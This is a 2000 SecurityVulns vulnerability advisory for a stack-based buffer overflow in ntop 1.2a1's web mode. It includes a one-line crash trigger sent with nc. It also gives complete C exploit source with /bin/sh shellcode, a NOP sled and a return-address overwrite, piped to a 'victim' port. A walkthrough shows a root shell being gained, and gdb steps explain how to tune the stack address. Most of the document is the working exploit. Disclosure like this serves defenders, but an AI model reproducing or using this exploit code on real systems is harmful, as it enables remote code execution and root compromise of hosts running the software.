Ntop -w remote exploit

2000-10-26T00:00:00
ID SECURITYVULNS:DOC:829
Type securityvulns
Reporter Securityvulns
Modified 2000-10-26T00:00:00

Description

  1. Problem: ntop has a stack-based BOF when it's requested too long filename.
  2. Tested Version ntop-1.2a1 I only tested this version.
  3. Example

  4. first run ntop -w 8080

  5. run this script $ printf "GET /perl -e 'print "A"x240'\r\n\r\n" |nc localhost 8080

  6. the ntop goes seg. fault. $ ntop -w 8080 ntop v.1.2a1 MT [i686-pc-linux-gnu] listening on eth0. Copyright 1998-99 by Luca Deri <deri@unipi.it> Warning: unable to read file '.ntop'. No security will be used! Waiting for HTTP connections on port 8080... Segmentation fault

  7. Exploit

----------------------ntop-w-exp.c-----start-----------------------

include <stdio.h>

include <string.h>

char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void usage() { printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n"); printf(" mat@hacksware.com\n"); printf("Usage : ./ntop-w-exp | nc victim port\n"); exit(0); }

void main( int argc, char *argv[] ) { int i,offset=-24;

define CODE_LEN 240

define NOP_LEN 50

char code_buf[CODE_LEN]; unsigned long esp=0xbedffb00;

if(argc >= 2) offset = atoi(argv[1]);

memset(code_buf,0x90,NOP_LEN); //insert NOP CODES memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode)); for(i=strlen(shellcode)+NOP_LEN;i<=CODE_LEN;i+=4) (long )&code_buf[i]=(unsigned long)esp-offset;

printf("GET /"); for(i=0;i<CODE_LEN; i++) { putchar(code_buf[i]); } printf("\r\n\r\n"); } -------------------------ntop-w-exp.c----end--------------------------

  1. Example
  2. first you run ntop -w 8080 in victim machine [mat@overheaven mat]$ id uid=500(mat) gid=500(mat) groups=500(mat),0(root),200(staff) [mat@overheaven mat]$ ntop -w 8080 ntop v.1.2a1 MT [i686-pc-linux-gnu] listening on eth0. Copyright 1998-99 by Luca Deri <deri@unipi.it> Warning: unable to read file '.ntop'. No security will be used! Waiting for HTTP connections on port 8080...

  3. compile exploit $ gcc -o ntop-w-exp ntop-w-exp.c

  4. send shell code to overheaven $ ./ntop-w-exp |nc overheaven 8080
  5. Now you get root shell in overheaven terminal base# hostname overheaven bash# id uid=0(root) gid=500(mat) groups=500(mat),0(root),200(staff)
  6. You cannot get shell in WWW port, so you can alternatively run programs other than "/bin/sh" by modifying shellcode.
  7. If you cannot get shellcode to work, you must modify esp value in ntop-w-exp.c. Using gdb you can easily guess it.

    1. break returnHTTPPage
    2. break strcpy
    3. x/x $esp

================================================= | | | mat@hacksware.com | | | =================================================